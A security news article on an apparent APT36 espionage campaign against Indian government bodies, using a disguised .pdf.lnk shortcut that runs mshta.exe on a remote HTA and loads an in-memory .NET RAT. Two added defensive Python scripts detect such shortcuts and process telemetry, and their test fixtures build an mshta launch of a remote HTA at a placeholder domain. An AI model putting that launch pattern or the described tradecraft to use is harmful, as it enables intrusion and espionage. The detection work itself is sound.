A suspected nation-state group launched a cyber-espionage campaign targeting Indian government entities using malicious Windows shortcut files.
The campaign uses “… deceptive delivery techniques, including a weaponized Windows shortcut (LNK) file masquerading as a legitimate PDF document and embedded with full PDF content to evade user suspicion,” said Cyfirma researchers.
APT36 Behind the LNK Espionage Campaign
The campaign is attributed to APT36, also known as Transparent Tribe, a threat actor with a long history of targeting government, defense, and research organizations in South Asia.
The attack begins with spear-phishing emails delivering a ZIP archive titled Online JLPT Exam Dec 2025.zip, an exam-themed lure intended to trick officials into opening the attachment.
Once extracted, the archive presents a file named Online JLPT Exam Dec 2025.pdf, which appears to be a standard document but is actually a malicious shortcut using a double extension (.pdf.lnk).
Because Windows suppresses the .lnk extension in Explorer even when file extensions are otherwise set to be shown, users who have enabled file extensions may still see what looks like a harmless PDF.
From LNK to RAT: Breaking Down the Attack
The shortcut file is unusually large — over 2 MB — closer in size to a real PDF than a typical LNK.
Cyfirma researchers found that the file embeds a full PDF structure and multiple images to reinforce its legitimacy.
When opened, however, Windows executes the shortcut’s target command instead of opening a document.
Rather than launching a PDF reader, the shortcut invokes mshta.exe, a trusted Windows utility, and passes it a remote HTML Application (HTA) file hosted on attacker-controlled infrastructure.
The command silently retrieves and executes the script in a hidden window, making the infection invisible to the victim.
The HTA script uses custom Base64 decoding and XOR decryption routines to reconstruct two payload components in memory.
One component weakens .NET security checks and prepares the runtime environment, while the second loads an encrypted .NET-based remote access trojan (RAT) directly into memory.
No malicious files are written to disk, reducing the likelihood of detection by traditional antivirus tools.
To further evade suspicion, the malware downloads and opens a legitimate JLPT exam PDF once execution is complete.
From the victim’s perspective, the document appears to open normally, masking the fact that the system has already been compromised.
The researchers noted that the malware communicates with its command-and-control (C2) server over encrypted channels and relies heavily on trusted Windows processes, making detection and attribution more challenging.
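The shortcut characteristics described above (a document-style double extension, an oversized LNK, a script host as the target, a remote URL as its argument, a hidden window, and embedded PDF content) can all be checked without executing the file. The following script is an added example, not Cyfirma's tooling or a sample from the campaign: it parses the Shell Link header and StringData section as laid out in the MS-SHLLINK specification, applies those checks, and builds an in-memory lookalike for testing. The size threshold, the script-host list, the placeholder domain `placeholder.invalid`, and the mshta.exe relative path in the fixture are assumptions.

```python
import struct

# Shell Link (.LNK) header constants from the MS-SHLLINK specification
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWNORMAL = 1  # any other ShowCommand value hides or minimises the window

# Triage heuristics (assumptions; tune them to your environment)
SIZE_THRESHOLD = 1_000_000  # benign shortcuts are usually a few KB
SCRIPT_HOSTS = ("mshta", "powershell", "cmd", "wscript", "cscript", "rundll32")
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a .LNK; return target strings, ShowCommand and size."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip the IDList (2-byte size prefix, not self-inclusive)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # skip LinkInfo (4-byte size prefix, self-inclusive)
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
    return {"flags": flags, "show_command": show_command, "strings": strings,
            "size": len(data), "string_data_end": pos}


def assess_lnk(filename: str, data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOC_EXTENSIONS):
        findings.append("double extension: document-looking name ends in .lnk")
    if len(data) > SIZE_THRESHOLD:
        findings.append(f"oversized shortcut: {len(data)} bytes")
    info = parse_lnk(data)
    target = " ".join(info["strings"].get(k, "") for k in ("relative_path", "arguments")).lower()
    for host in SCRIPT_HOSTS:
        if host in target:
            findings.append(f"target invokes script host {host}")
            break
    if "http://" in target or "https://" in target:
        findings.append("target passes a remote URL to the executable")
    if info["show_command"] != SW_SHOWNORMAL:
        findings.append(f"window hidden or minimised (ShowCommand={info['show_command']})")
    if b"%PDF-" in data[info["string_data_end"]:]:
        findings.append("PDF content embedded after the shortcut structures")
    return findings


def build_sample_lnk(relative_path: str, arguments: str, show_command: int, trailer: bytes = b"") -> bytes:
    """Construct a minimal Unicode .LNK in memory (test fixture, not a real sample)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path) + (string_data(arguments) if arguments else b"")
    terminal_block = struct.pack("<I", 0)  # ends the ExtraData section
    return header + body + terminal_block + trailer


if __name__ == "__main__":
    # Constructed lookalike of the lure described above: placeholder URL, padded PDF-like trailer
    lure = build_sample_lnk(r"..\..\..\Windows\System32\mshta.exe",
                            "https://placeholder.invalid/lure.hta", 7,
                            b"%PDF-1.4\n" + b"\0" * 2_100_000)
    for finding in assess_lnk("Online JLPT Exam Dec 2025.pdf.lnk", lure):
        print("[!]", finding)
    benign = build_sample_lnk(r"..\Documents\report.pdf", "", SW_SHOWNORMAL)
    print(assess_lnk("report.lnk", benign))  # []
```

Run at a mail gateway or in a sandbox against the contents of ZIP attachments, `assess_lnk` separates the lure-style shortcut (six findings) from an ordinary document shortcut (none). Parsing stops at StringData on purpose: the target path and arguments are what matter for triage, and anything appended after the terminal block (such as the embedded PDF) is ignored by Windows but still visible to the size and signature checks.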
The espionage campaign abusing Windows shortcut files highlights how attackers continue to leverage trusted file types and built-in system tools to bypass traditional defenses.
Because these attacks often rely on living-off-the-land techniques and fileless execution, they can evade signature-based detection and persist in enterprise environments.
The following measures outline practical steps organizations can take to reduce exposure, improve detection, and limit the impact of shortcut-based malware attacks.
- Treat Windows shortcut (.lnk) files as high-risk attachments by blocking or restricting their execution when delivered via email or untrusted sources.
- Restrict or disable mshta.exe and HTA execution using Group Policy, AppLocker, or WDAC to prevent abuse of built-in Windows tools.
- Strengthen email security controls to detect double extensions, oversized shortcuts, and malicious ZIP archives before delivery.
- Deploy EDR and memory-based protections to detect in-memory malware, living-off-the-land techniques, and suspicious .NET runtime behavior.
- Limit attacker command-and-control opportunities by monitoring and restricting outbound network traffic, especially to newly registered or uncommon domains.
- Reduce overall risk through security awareness training, least-privilege endpoint access, and incident response plans tailored for fileless attacks.
Combined, these controls help limit attacker movement and contain the blast radius of shortcut-based attacks.
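On the endpoint side, the EDR and memory-protection measures above come down to correlating two signals the page describes: a script host such as mshta.exe being handed a remote URL after a user opens a file, and the .NET runtime appearing inside that script host. The script below is an added example, not a vendor detection rule: it runs that logic over a handful of constructed process-creation and image-load events whose field names loosely follow Sysmon's, and escalates when both signals land in the same process. The script-host list, the CLR module list, and the `placeholder.invalid` domain are assumptions.

```python
import json
from pathlib import PureWindowsPath

# Heuristics (assumptions; adjust for your estate): script hosts commonly abused for
# fileless execution, the shells a user double-click comes from, and .NET runtime modules
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
USER_SHELLS = {"explorer.exe"}
CLR_MODULES = {"clr.dll", "mscoree.dll", "mscorlib.ni.dll", "clrjit.dll"}

# Constructed sample telemetry (not real logs); fields loosely follow Sysmon events 1 and 7
SAMPLE_EVENTS = r"""
{"event": "ProcessCreate", "ProcessId": 4120, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" https://placeholder.invalid/lure.hta"}
{"event": "ImageLoad", "ProcessId": 4120, "Image": "C:\\Windows\\System32\\mshta.exe", "ImageLoaded": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll"}
{"event": "ProcessCreate", "ProcessId": 5010, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Vendor\\Installer.exe", "CommandLine": "mshta.exe \"C:\\Program Files\\Vendor\\setup.hta\""}
{"event": "ProcessCreate", "ProcessId": 5300, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"}
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def triage(lines) -> list:
    """Return (severity, pid, reason) tuples for suspicious script-host activity."""
    findings, remote_launch_pids, clr_pids = [], set(), set()
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        image, pid = basename(ev.get("Image", "")), ev.get("ProcessId")
        if ev["event"] == "ProcessCreate":
            parent = basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "").lower()
            if image in SCRIPT_HOSTS and ("http://" in cmd or "https://" in cmd):
                # A script host fetching a remote script is the mshta/HTA pattern from the
                # article; launched by explorer.exe it most likely came from a user-opened file
                severity = "high" if parent in USER_SHELLS else "medium"
                findings.append((severity, pid, f"{image} launched with a remote URL by {parent}"))
                remote_launch_pids.add(pid)
        elif ev["event"] == "ImageLoad":
            loaded = basename(ev.get("ImageLoaded", ""))
            if image in SCRIPT_HOSTS and loaded in CLR_MODULES:
                # A script host has no ordinary reason to host the .NET runtime
                findings.append(("medium", pid, f"{image} loaded .NET runtime module {loaded}"))
                clr_pids.add(pid)
    # Correlate: a remote script fetch followed by a CLR load in the same process matches
    # the in-memory .NET RAT staging described above
    for pid in sorted(remote_launch_pids & clr_pids):
        findings.append(("critical", pid, "remote script host execution followed by .NET runtime load"))
    return findings


if __name__ == "__main__":
    for severity, pid, reason in triage(SAMPLE_EVENTS.splitlines()):
        print(f"[{severity}] pid={pid}: {reason}")
```

The local-file mshta launch (pid 5010) and the notepad launch are deliberately left unflagged so the rule stays specific to remote script retrieval; the vendor-installer case is the kind of benign mshta use that a blanket block via AppLocker or WDAC would need an exception for, which is why the policy and the telemetry rule belong together.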
Attackers Hide in Plain Sight
This campaign reflects a broader trend in modern threat actor operations, where attackers deliberately abuse trusted file formats and native system tools to blend malicious activity into normal user behavior.
By leveraging commonly accepted files and built-in Windows utilities, threat actors can bypass traditional security controls and evade detection.
As attackers increasingly exploit implicit trust in familiar tools and file types, many organizations are turning to zero-trust approaches to continuously verify activity and limit abuse.
